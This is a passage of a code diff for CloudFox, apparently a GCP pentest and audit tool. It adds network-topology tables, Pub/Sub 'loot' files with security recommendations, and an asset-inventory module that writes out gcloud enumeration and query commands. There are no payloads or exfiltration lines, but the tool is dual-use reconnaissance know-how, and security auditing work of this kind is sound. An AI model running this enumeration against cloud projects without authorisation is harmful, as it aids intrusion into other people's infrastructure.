Access", + "Flow Logs", + "Purpose", + } + + var subnetsBody [][]string + for _, s := range m.Subnets { + purpose := s.Purpose + if purpose == "" { + purpose = "PRIVATE" + } + + subnetsBody = append(subnetsBody, []string{ + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + fmt.Sprintf("%t", s.PrivateIPGoogleAccess), + fmt.Sprintf("%t", s.FlowLogsEnabled), + purpose, + }) + } + + // VPC Peerings table + peeringsHeader := []string{ + "Name", + "Local Network", + "Peer Network", + "Peer Project", + "State", + "Import Routes", + "Export Routes", + } + + var peeringsBody [][]string + for _, p := range m.Peerings { + peeringsBody = append(peeringsBody, []string{ + p.Name, + m.extractNetworkName(p.Network), + m.extractNetworkName(p.PeerNetwork), + p.PeerProjectID, + p.State, + fmt.Sprintf("%t", p.ImportCustomRoute), + fmt.Sprintf("%t", p.ExportCustomRoute), + }) + + // Add to peering analysis loot + m.LootMap["peering-analysis"].Contents += fmt.Sprintf( + "## Peering: %s\n"+ + "Local: %s\n"+ + "Peer: %s (project: %s)\n"+ + "State: %s\n"+ + "Custom Routes - Import: %t, Export: %t\n\n"+ + "# Commands to analyze:\n"+ + "gcloud compute networks peerings list --project=%s\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n", + p.Name, + m.extractNetworkName(p.Network), + m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, + p.State, + p.ImportCustomRoute, p.ExportCustomRoute, + p.ProjectID, + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + ) + } + + // Trust Boundaries table + trustHeader := []string{ + "Name", + "Type", + "Source", + "Target", + "Risk Level", + } + + var trustBody [][]string + for _, t := range m.TrustBoundarie { + trustBody = append(trustBody, []string{ + t.Name, + t.Type, + truncateString(t.SourceScope, 40), + truncateString(t.TargetScope, 40), + t.RiskLevel, + }) + } + + // Cloud NAT table + natHeader := []string{ + "Name", + "Project", + "Region", + "Network", + "NAT IPs", + "Logging", + } + + var natBody [][]string + for _, nat := range m.NATs { + natIPs := strings.Join(nat.NATIPAddresses, ",") + if len(natIPs) > 30 { + natIPs = fmt.Sprintf("%d IPs", len(nat.NATIPAddresses)) + } + + natBody = append(natBody, []string{ + nat.Name, + nat.ProjectID, + nat.Region, + m.extractNetworkName(nat.Network), + natIPs, + fmt.Sprintf("%t", nat.EnableLogging), + }) + + // Add to NAT analysis loot + m.LootMap["nat-analysis"].Contents += fmt.Sprintf( + "## Cloud NAT: %s\n"+ + "Project: %s\n"+ + "Region: %s\n"+ + "Network: %s\n"+ + "NAT IPs: %v\n"+ + "Min Ports Per VM: %d\n"+ + "Logging Enabled: %t\n\n", + nat.Name, + nat.ProjectID, + nat.Region, + m.extractNetworkName(nat.Network), + nat.NATIPAddresses, + nat.MinPortsPerVM, + nat.EnableLogging, + ) + } + + // Shared VPC commands + for hostProject, config := range m.SharedVPCs { + m.LootMap["shared-vpc-commands"].Contents += fmt.Sprintf( + "## Shared VPC Host: %s\n"+ + "Service Projects: %v\n\n"+ + "# List Shared VPC resources:\n"+ + "gcloud compute shared-vpc list-associated-resources %s\n"+ + "gcloud compute shared-vpc get-host-project %s\n\n", + hostProject, + config.ServiceProjects, + hostProject, + hostProject, + ) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "vpc-networks", + Header: networksHeader, + Body: networksBody, + }, + } + + if len(subnetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: subnetsHeader, + Body: subnetsBody, + }) + } + + if len(peeringsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: peeringsHeader, + Body: peeringsBody, + }) + } + + if len(trustBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "trust-boundaries", + Header: trustHeader, + Body: trustBody, + }) + } + + if len(natBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloud-nat", + Header: natHeader, + Body: natBody, + }) + } + + output := NetworkTopologyOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index efcdacaa..fa40052c 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -194,6 +194,27 @@ func (m *PubSubModule) initializeLootFiles() { Name: "pubsub-exploitation", Contents: "# Pub/Sub Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } + // New enhancement loot files + m.LootMap["pubsub-dead-letter"] = &internal.LootFile{ + Name: "pubsub-dead-letter", + Contents: "# Pub/Sub Dead Letter Topic Configuration\n# Failed messages are sent to these topics\n# Generated by CloudFox\n\n", + } + m.LootMap["pubsub-cross-project"] = &internal.LootFile{ + Name: "pubsub-cross-project", + Contents: "# Pub/Sub Cross-Project Subscriptions\n# These subscriptions consume from topics in other projects\n# Generated by CloudFox\n\n", + } + m.LootMap["pubsub-exports"] = &internal.LootFile{ + Name: "pubsub-exports", + Contents: "# Pub/Sub Export Destinations\n# BigQuery and Cloud Storage export targets\n# Generated by CloudFox\n\n", + } + m.LootMap["pubsub-no-retention"] = &internal.LootFile{ + Name: "pubsub-no-retention", + Contents: "# Pub/Sub Subscriptions WITHOUT Message Retention\n# Messages may be lost if not acknowledged\n# Generated by CloudFox\n\n", + } + m.LootMap["pubsub-security-recommendations"] = &internal.LootFile{ + Name: "pubsub-security-recommendations", + Contents: "# Pub/Sub Security Recommendations\n# Generated by CloudFox\n\n", + } } func (m *PubSubModule) addTopicToLoot(topic PubSubService.TopicInfo) { @@ -238,6 +259,9 @@ func (m *PubSubModule) addTopicToLoot(topic PubSubService.TopicInfo) { topic.Name, topic.ProjectID, topic.Name, topic.ProjectID, ) + + // Add security recommendations + m.addTopicSecurityRecommendations(topic) } func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) { @@ -280,6 +304,92 @@ func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) ) } + // Dead letter topic configuration + if sub.DeadLetterTopic != "" { + m.LootMap["pubsub-dead-letter"].Contents += fmt.Sprintf( + "# Subscription: %s\n"+ + "# Project: %s\n"+ + "# Topic: %s\n"+ + "# Dead Letter Topic: %s\n"+ + "# Max Delivery Attempts: %d\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n\n", + sub.Name, + sub.ProjectID, + sub.Topic, + sub.DeadLetterTopic, + sub.MaxDeliveryAttempts, + sub.Name, sub.ProjectID, + ) + } + + // Cross-project subscriptions + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + m.LootMap["pubsub-cross-project"].Contents += fmt.Sprintf( + "# CROSS-PROJECT SUBSCRIPTION\n"+ + "# Subscription: %s (Project: %s)\n"+ + "# Subscribes to topic in: %s\n"+ + "# Topic: %s\n"+ + "# This indicates a trust relationship between projects\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n\n", + sub.Name, sub.ProjectID, + sub.TopicProject, + sub.Topic, + sub.Name, sub.ProjectID, + ) + } + + // Export destinations (BigQuery/GCS) + if sub.BigQueryTable != "" { + m.LootMap["pubsub-exports"].Contents += fmt.Sprintf( + "# BIGQUERY EXPORT\n"+ + "# Subscription: %s (Project: %s)\n"+ + "# Topic: %s\n"+ + "# BigQuery Table: %s\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "bq show %s\n\n", + sub.Name, sub.ProjectID, + sub.Topic, + sub.BigQueryTable, + sub.Name, sub.ProjectID, + sub.BigQueryTable, + ) + } + if sub.CloudStorageBucket != "" { + m.LootMap["pubsub-exports"].Contents += fmt.Sprintf( + "# CLOUD STORAGE EXPORT\n"+ + "# Subscription: %s (Project: %s)\n"+ + "# Topic: %s\n"+ + "# GCS Bucket: %s\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "gsutil ls gs://%s/\n\n", + sub.Name, sub.ProjectID, + sub.Topic, + sub.CloudStorageBucket, + sub.Name, sub.ProjectID, + sub.CloudStorageBucket, + ) + } + + // No message retention (potential data loss) + if sub.MessageRetention == "" && !sub.RetainAckedMessages { + m.LootMap["pubsub-no-retention"].Contents += fmt.Sprintf( + "# Subscription: %s\n"+ + "# Project: %s\n"+ + "# Topic: %s\n"+ + "# No message retention configured - unacked messages may be lost\n"+ + "# Ack Deadline: %ds\n"+ + "gcloud pubsub subscriptions update %s --project=%s --message-retention-duration=7d\n\n", + sub.Name, + sub.ProjectID, + sub.Topic, + sub.AckDeadlineSeconds, + sub.Name, sub.ProjectID, + ) + } + + // Add security recommendations + m.addSubscriptionSecurityRecommendations(sub) + // Exploitation commands m.LootMap["pubsub-exploitation"].Contents += fmt.Sprintf( "# Subscription: %s (Project: %s)\n"+ @@ -480,3 +590,154 @@ func truncateBQ(table string) string { } return table } + +// ------------------------------ +// Security Recommendations +// ------------------------------ + +// addTopicSecurityRecommendations generates security recommendations for a topic +func (m *PubSubModule) addTopicSecurityRecommendations(topic PubSubService.TopicInfo) { + var recommendations []string + + // Public publish access - CRITICAL + if topic.IsPublicPublish { + recommendations = append(recommendations, + fmt.Sprintf("[CRITICAL] Topic %s allows public publishing (allUsers/allAuthenticatedUsers)\n"+ + " Risk: Anyone can inject messages into this topic\n"+ + " Fix: Remove public access:\n"+ + " gcloud pubsub topics remove-iam-policy-binding %s --project=%s --member=allUsers --role=roles/pubsub.publisher\n"+ + " gcloud pubsub topics remove-iam-policy-binding %s --project=%s --member=allAuthenticatedUsers --role=roles/pubsub.publisher\n", + topic.Name, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID)) + } + + // Public subscribe access - HIGH + if topic.IsPublicSubscribe { + recommendations = append(recommendations, + fmt.Sprintf("[HIGH] Topic %s allows public subscription (allUsers/allAuthenticatedUsers)\n"+ + " Risk: Anyone can create subscriptions to read messages\n"+ + " Fix: Remove public access:\n"+ + " gcloud pubsub topics remove-iam-policy-binding %s --project=%s --member=allUsers --role=roles/pubsub.subscriber\n"+ + " gcloud pubsub topics remove-iam-policy-binding %s --project=%s --member=allAuthenticatedUsers --role=roles/pubsub.subscriber\n", + topic.Name, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID)) + } + + // No KMS encryption - MEDIUM + if topic.KmsKeyName == "" { + recommendations = append(recommendations, + fmt.Sprintf("[MEDIUM] Topic %s uses Google-managed encryption instead of CMEK\n"+ + " Risk: Less control over encryption keys\n"+ + " Fix: Configure customer-managed encryption:\n"+ + " gcloud pubsub topics update %s --project=%s --message-encryption-key-name=projects/PROJECT/locations/LOCATION/keyRings/KEYRING/cryptoKeys/KEY\n", + topic.Name, + topic.Name, topic.ProjectID)) + } + + // No message retention - LOW + if topic.MessageRetentionDuration == "" { + recommendations = append(recommendations, + fmt.Sprintf("[LOW] Topic %s has no message retention configured\n"+ + " Risk: Messages may be lost if subscribers are temporarily unavailable\n"+ + " Fix: Configure message retention:\n"+ + " gcloud pubsub topics update %s --project=%s --message-retention-duration=7d\n", + topic.Name, + topic.Name, topic.ProjectID)) + } + + // No subscriptions - INFO + if topic.SubscriptionCount == 0 { + recommendations = append(recommendations, + fmt.Sprintf("[INFO] Topic %s has no subscriptions\n"+ + " Risk: Messages published to this topic are not being consumed\n"+ + " Consider: Creating a subscription or removing unused topic\n", + topic.Name)) + } + + if len(recommendations) > 0 { + m.LootMap["pubsub-security-recommendations"].Contents += fmt.Sprintf( + "# Topic: %s (Project: %s)\n%s\n", + topic.Name, topic.ProjectID, + strings.Join(recommendations, "\n")) + } +} + +// addSubscriptionSecurityRecommendations generates security recommendations for a subscription +func (m *PubSubModule) addSubscriptionSecurityRecommendations(sub PubSubService.SubscriptionInfo) { + var recommendations []string + + // Public consume access - CRITICAL + if sub.IsPublicConsume { + recommendations = append(recommendations, + fmt.Sprintf("[CRITICAL] Subscription %s allows public message consumption\n"+ + " Risk: Anyone can read messages from this subscription\n"+ + " Fix: Remove public access:\n"+ + " gcloud pubsub subscriptions remove-iam-policy-binding %s --project=%s --member=allUsers --role=roles/pubsub.subscriber\n"+ + " gcloud pubsub subscriptions remove-iam-policy-binding %s --project=%s --member=allAuthenticatedUsers --role=roles/pubsub.subscriber\n", + sub.Name, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID)) + } + + // Push endpoint without OIDC auth - HIGH + if sub.PushEndpoint != "" && sub.PushServiceAccount == "" { + recommendations = append(recommendations, + fmt.Sprintf("[HIGH] Push subscription %s has no OIDC authentication configured\n"+ + " Risk: Push endpoint may not verify message authenticity\n"+ + " Fix: Configure OIDC authentication:\n"+ + " gcloud pubsub subscriptions update %s --project=%s --push-auth-service-account=SA_EMAIL --push-auth-token-audience=AUDIENCE\n", + sub.Name, + sub.Name, sub.ProjectID)) + } + + // Push endpoint to external URL - MEDIUM + if sub.PushEndpoint != "" && !strings.Contains(sub.PushEndpoint, ".run.app") && !strings.Contains(sub.PushEndpoint, "cloudfunctions.net") { + recommendations = append(recommendations, + fmt.Sprintf("[MEDIUM] Push subscription %s sends to external endpoint: %s\n"+ + " Risk: Data exfiltration to external systems\n"+ + " Review: Verify this is an authorized endpoint\n"+ + " gcloud pubsub subscriptions describe %s --project=%s\n", + sub.Name, sub.PushEndpoint, + sub.Name, sub.ProjectID)) + } + + // No dead letter topic - LOW + if sub.DeadLetterTopic == "" { + recommendations = append(recommendations, + fmt.Sprintf("[LOW] Subscription %s has no dead letter topic configured\n"+ + " Risk: Failed messages may be lost without visibility\n"+ + " Fix: Configure dead letter topic:\n"+ + " gcloud pubsub subscriptions update %s --project=%s --dead-letter-topic=TOPIC_NAME --max-delivery-attempts=5\n", + sub.Name, + sub.Name, sub.ProjectID)) + } + + // Short ack deadline - INFO + if sub.AckDeadlineSeconds < 30 { + recommendations = append(recommendations, + fmt.Sprintf("[INFO] Subscription %s has short ack deadline (%ds)\n"+ + " Risk: Messages may be redelivered unnecessarily\n"+ + " Consider: Increasing ack deadline if processing takes longer:\n"+ + " gcloud pubsub subscriptions update %s --project=%s --ack-deadline=60\n", + sub.Name, sub.AckDeadlineSeconds, + sub.Name, sub.ProjectID)) + } + + // Cross-project subscription - INFO + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + recommendations = append(recommendations, + fmt.Sprintf("[INFO] Subscription %s consumes from topic in different project (%s)\n"+ + " Note: This indicates a cross-project trust relationship\n"+ + " Review: Verify this cross-project access is intended\n", + sub.Name, sub.TopicProject)) + } + + if len(recommendations) > 0 { + m.LootMap["pubsub-security-recommendations"].Contents += fmt.Sprintf( + "# Subscription: %s (Project: %s)\n%s\n", + sub.Name, sub.ProjectID, + strings.Join(recommendations, "\n")) + } +} diff --git a/gcp/commands/resourcegraph.go b/gcp/commands/resourcegraph.go new file mode 100644 index 00000000..3f2e975a --- /dev/null +++ b/gcp/commands/resourcegraph.go @@ -0,0 +1,731 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + asset "cloud.google.com/go/asset/apiv1" + "cloud.google.com/go/asset/apiv1/assetpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_RESOURCEGRAPH_MODULE_NAME string = "resource-graph" + +var GCPResourceGraphCommand = &cobra.Command{ + Use: GCP_RESOURCEGRAPH_MODULE_NAME, + Aliases: []string{"assets", "inventory", "cai"}, + Short: "Advanced resource query capabilities using Cloud Asset Inventory", + Long: `Query and analyze resources across projects using Cloud Asset Inventory. + +Features: +- Lists all resources across multiple projects +- Analyzes resource dependencies and relationships +- Identifies cross-project resources +- Generates comprehensive asset inventory +- Provides query templates for common security use cases +- Tracks resource metadata and labels + +Use Cases: +- Complete resource inventory for auditing +- Cross-project dependency mapping +- Resource lifecycle analysis +- Compliance evidence gathering +- Security posture assessment + +Requires appropriate IAM permissions: +- roles/cloudasset.viewer +- roles/resourcemanager.projectViewer`, + Run: runGCPResourceGraphCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AssetResource struct { + Name string + AssetType string + ProjectID string + Location string + DisplayName string + ParentFullName string + CreateTime string + UpdateTime string + State string + Labels map[string]string + NetworkTags []string + ResourceURL string +} + +type ResourceDependency struct { + SourceResource string + SourceType string + TargetResource string + TargetType string + DependencyType string // uses, references, contains, manages + ProjectID string +} + +type CrossProjectResource struct { + ResourceName string + ResourceType string + OwnerProject string + AccessedFrom []string + AccessType string + RiskLevel string +} + +type ResourceTypeSummary struct { + AssetType string + Count int + ProjectIDs []string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ResourceGraphModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Assets []AssetResource + Dependencies []ResourceDependency + CrossProject []CrossProjectResource + TypeSummary map[string]*ResourceTypeSummary + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking + totalAssets int + assetsByType map[string]int + assetsByProject map[string]int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ResourceGraphOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ResourceGraphOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ResourceGraphOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPResourceGraphCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_RESOURCEGRAPH_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &ResourceGraphModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Assets: []AssetResource{}, + Dependencies: []ResourceDependency{}, + CrossProject: []CrossProjectResource{}, + TypeSummary: make(map[string]*ResourceTypeSummary), + LootMap: make(map[string]*internal.LootFile), + assetsByType: make(map[string]int), + assetsByProject: make(map[string]int), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ResourceGraphModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Querying Cloud Asset Inventory for resource analysis...", GCP_RESOURCEGRAPH_MODULE_NAME) + + // Create Asset client + assetClient, err := asset.NewClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Cloud Asset client: %v", err), GCP_RESOURCEGRAPH_MODULE_NAME) + return + } + defer assetClient.Close() + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, assetClient, logger) + }(projectID) + } + wg.Wait() + + // Analyze cross-project dependencies + m.analyzeCrossProjectResources(logger) + + // Generate query templates + m.generateQueryTemplates() + + // Check results + if m.totalAssets == 0 { + logger.InfoM("No assets found via Cloud Asset Inventory", GCP_RESOURCEGRAPH_MODULE_NAME) + logger.InfoM("Ensure Cloud Asset API is enabled and you have appropriate permissions", GCP_RESOURCEGRAPH_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Inventoried %d asset(s) across %d project(s)", + m.totalAssets, len(m.assetsByProject)), GCP_RESOURCEGRAPH_MODULE_NAME) + + // Show top asset types + typeCount := len(m.assetsByType) + if typeCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d unique asset type(s)", typeCount), GCP_RESOURCEGRAPH_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ResourceGraphModule) processProject(ctx context.Context, projectID string, assetClient *asset.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Querying assets for project: %s", projectID), GCP_RESOURCEGRAPH_MODULE_NAME) + } + + parent := fmt.Sprintf("projects/%s", projectID) + + // List assets with content type set to get full resource details + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + PageSize: 500, + } + + it := assetClient.ListAssets(ctx, req) + assetCount := 0 + + for { + asset, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing assets for project %s: %v", projectID, err), GCP_RESOURCEGRAPH_MODULE_NAME) + } + break + } + + assetResource := m.parseAsset(asset, projectID) + + m.mu.Lock() + m.Assets = append(m.Assets, assetResource) + m.totalAssets++ + assetCount++ + + // Track by type + m.assetsByType[assetResource.AssetType]++ + + // Track by project + m.assetsByProject[projectID]++ + + // Update type summary + if summary, exists := m.TypeSummary[assetResource.AssetType]; exists { + summary.Count++ + // Add project if not already tracked + found := false + for _, p := range summary.ProjectIDs { + if p == projectID { + found = true + break + } + } + if !found { + summary.ProjectIDs = append(summary.ProjectIDs, projectID) + } + } else { + m.TypeSummary[assetResource.AssetType] = &ResourceTypeSummary{ + AssetType: assetResource.AssetType, + Count: 1, + ProjectIDs: []string{projectID}, + } + } + m.mu.Unlock() + + // Analyze dependencies + m.analyzeAssetDependencies(asset, projectID) + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d assets in project %s", assetCount, projectID), GCP_RESOURCEGRAPH_MODULE_NAME) + } +} + +func (m *ResourceGraphModule) parseAsset(asset *assetpb.Asset, projectID string) AssetResource { + assetResource := AssetResource{ + Name: asset.Name, + AssetType: asset.AssetType, + ProjectID: projectID, + } + + // Parse resource data if available + if asset.Resource != nil { + assetResource.ParentFullName = asset.Resource.Parent + assetResource.ResourceURL = asset.Resource.DiscoveryDocumentUri + assetResource.Location = asset.Resource.Location + + // Extract display name from resource data + if asset.Resource.Data != nil { + if name, ok := asset.Resource.Data.Fields["name"]; ok { + assetResource.DisplayName = name.GetStringValue() + } + if displayName, ok := asset.Resource.Data.Fields["displayName"]; ok { + assetResource.DisplayName = displayName.GetStringValue() + } + + // Extract labels + if labels, ok := asset.Resource.Data.Fields["labels"]; ok { + if labels.GetStructValue() != nil { + assetResource.Labels = make(map[string]string) + for k, v := range labels.GetStructValue().Fields { + assetResource.Labels[k] = v.GetStringValue() + } + } + } + + // Extract network tags for compute instances + if tags, ok := asset.Resource.Data.Fields["tags"]; ok { + if tagsStruct := tags.GetStructValue(); tagsStruct != nil { + if items, ok := tagsStruct.Fields["items"]; ok { + for _, item := range items.GetListValue().Values { + assetResource.NetworkTags = append(assetResource.NetworkTags, item.GetStringValue()) + } + } + } + } + } + } + + // Parse update time + if asset.UpdateTime != nil { + assetResource.UpdateTime = asset.UpdateTime.AsTime().Format("2006-01-02 15:04:05") + } + + return assetResource +} + +func (m *ResourceGraphModule) analyzeAssetDependencies(asset *assetpb.Asset, projectID string) { + if asset.Resource == nil || asset.Resource.Data == nil { + return + } + + // Common dependency patterns + dependencyFields := map[string]string{ + "network": "uses", + "subnetwork": "uses", + "serviceAccount": "uses", + "disk": "uses", + "snapshot": "references", + "image": "references", + "keyRing": "uses", + "cryptoKey": "uses", + "topic": "references", + "subscription": "references", + "bucket": "uses", + "dataset": "references", + "cluster": "contains", + } + + for field, depType := range dependencyFields { + if value, ok := asset.Resource.Data.Fields[field]; ok { + targetResource := value.GetStringValue() + if targetResource != "" { + dependency := ResourceDependency{ + SourceResource: asset.Name, + SourceType: asset.AssetType, + TargetResource: targetResource, + TargetType: m.inferResourceType(field), + DependencyType: depType, + ProjectID: projectID, + } + + m.mu.Lock() + m.Dependencies = append(m.Dependencies, dependency) + m.mu.Unlock() + } + } + } +} + +func (m *ResourceGraphModule) inferResourceType(fieldName string) string { + typeMap := map[string]string{ + "network": "compute.googleapis.com/Network", + "subnetwork": "compute.googleapis.com/Subnetwork", + "serviceAccount": "iam.googleapis.com/ServiceAccount", + "disk": "compute.googleapis.com/Disk", + "snapshot": "compute.googleapis.com/Snapshot", + "image": "compute.googleapis.com/Image", + "keyRing": "cloudkms.googleapis.com/KeyRing", + "cryptoKey": "cloudkms.googleapis.com/CryptoKey", + "topic": "pubsub.googleapis.com/Topic", + "subscription": "pubsub.googleapis.com/Subscription", + "bucket": "storage.googleapis.com/Bucket", + "dataset": "bigquery.googleapis.com/Dataset", + "cluster": "container.googleapis.com/Cluster", + } + + if assetType, ok := typeMap[fieldName]; ok { + return assetType + } + return "unknown" +} + +func (m *ResourceGraphModule) analyzeCrossProjectResources(logger internal.Logger) { + m.mu.Lock() + defer m.mu.Unlock() + + // Group dependencies by target resource + targetToSources := make(map[string][]string) // target -> source projects + targetToType := make(map[string]string) + + for _, dep := range m.Dependencies { + // Check if target is in a different project + targetProject := m.extractProjectFromResource(dep.TargetResource) + if targetProject != "" && targetProject != dep.ProjectID { + targetToSources[dep.TargetResource] = append(targetToSources[dep.TargetResource], dep.ProjectID) + targetToType[dep.TargetResource] = dep.TargetType + } + } + + // Create cross-project records + for target, sources := range targetToSources { + crossProject := CrossProjectResource{ + ResourceName: target, + ResourceType: targetToType[target], + OwnerProject: m.extractProjectFromResource(target), + AccessedFrom: sources, + AccessType: "dependency", + RiskLevel: "LOW", + } + + // Higher risk if accessed from many projects + if len(sources) > 2 { + crossProject.RiskLevel = "MEDIUM" + } + + m.CrossProject = append(m.CrossProject, crossProject) + } +} + +func (m *ResourceGraphModule) extractProjectFromResource(resource string) string { + // Format: //service.googleapis.com/projects/{project}/... + // or: projects/{project}/... + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *ResourceGraphModule) generateQueryTemplates() { + m.mu.Lock() + defer m.mu.Unlock() + + // Generate useful query templates for Cloud Asset Inventory + templates := []struct { + Name string + Description string + Query string + }{ + { + Name: "Public Storage Buckets", + Description: "Find all public GCS buckets", + Query: `resource.type="storage.googleapis.com/Bucket" AND resource.data.iamConfiguration.uniformBucketLevelAccess.enabled=false`, + }, + { + Name: "VMs with External IPs", + Description: "Find compute instances with external IP addresses", + Query: `resource.type="compute.googleapis.com/Instance" AND resource.data.networkInterfaces.accessConfigs:*`, + }, + { + Name: "Service Account Keys", + Description: "Find all user-managed service account keys", + Query: `resource.type="iam.googleapis.com/ServiceAccountKey" AND resource.data.keyType="USER_MANAGED"`, + }, + { + Name: "Firewall Rules - Open to Internet", + Description: "Find firewall rules allowing 0.0.0.0/0", + Query: `resource.type="compute.googleapis.com/Firewall" AND resource.data.sourceRanges:"0.0.0.0/0"`, + }, + { + Name: "Cloud SQL - Public IPs", + Description: "Find Cloud SQL instances with public IP", + Query: `resource.type="sqladmin.googleapis.com/Instance" AND resource.data.settings.ipConfiguration.ipv4Enabled=true`, + }, + { + Name: "Unencrypted Disks", + Description: "Find disks without customer-managed encryption", + Query: `resource.type="compute.googleapis.com/Disk" AND NOT resource.data.diskEncryptionKey:*`, + }, + { + Name: "GKE Clusters - Legacy Auth", + Description: "Find GKE clusters with legacy authentication", + Query: `resource.type="container.googleapis.com/Cluster" AND resource.data.legacyAbac.enabled=true`, + }, + { + Name: "Resources Without Labels", + Description: "Find resources missing required labels", + Query: `NOT labels:* AND (resource.type="compute.googleapis.com/Instance" OR resource.type="storage.googleapis.com/Bucket")`, + }, + } + + for _, t := range templates { + m.LootMap["query-templates"].Contents += fmt.Sprintf( + "## %s\n"+ + "# %s\n"+ + "# Query:\n"+ + "gcloud asset search-all-resources \\\n"+ + " --scope=projects/PROJECT_ID \\\n"+ + " --query='%s'\n\n", + t.Name, t.Description, t.Query, + ) + } + + // Add asset inventory export commands + m.LootMap["asset-inventory-commands"].Contents += "# Export complete asset inventory\n" + for _, projectID := range m.ProjectIDs { + m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( + "gcloud asset export \\\n"+ + " --project=%s \\\n"+ + " --content-type=resource \\\n"+ + " --output-path=gs://BUCKET_NAME/%s-assets.json\n\n", + projectID, projectID, + ) + } + + // Add search commands + m.LootMap["asset-inventory-commands"].Contents += "\n# Search for specific resource types\n" + m.LootMap["asset-inventory-commands"].Contents += "gcloud asset search-all-resources --scope=projects/PROJECT_ID --asset-types=compute.googleapis.com/Instance\n" + m.LootMap["asset-inventory-commands"].Contents += "gcloud asset search-all-resources --scope=projects/PROJECT_ID --asset-types=storage.googleapis.com/Bucket\n" + m.LootMap["asset-inventory-commands"].Contents += "gcloud asset search-all-resources --scope=projects/PROJECT_ID --asset-types=iam.googleapis.com/ServiceAccount\n" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ResourceGraphModule) initializeLootFiles() { + m.LootMap["query-templates"] = &internal.LootFile{ + Name: "query-templates", + Contents: "# Cloud Asset Inventory Query Templates\n# Generated by CloudFox\n# Use these queries to search for security-relevant resources\n\n", + } + m.LootMap["asset-inventory-commands"] = &internal.LootFile{ + Name: "asset-inventory-commands", + Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["resource-dependencies"] = &internal.LootFile{ + Name: "resource-dependencies", + Contents: "# Resource Dependencies\n# Generated by CloudFox\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ResourceGraphModule) writeOutput(ctx context.Context, logger internal.Logger) { + // 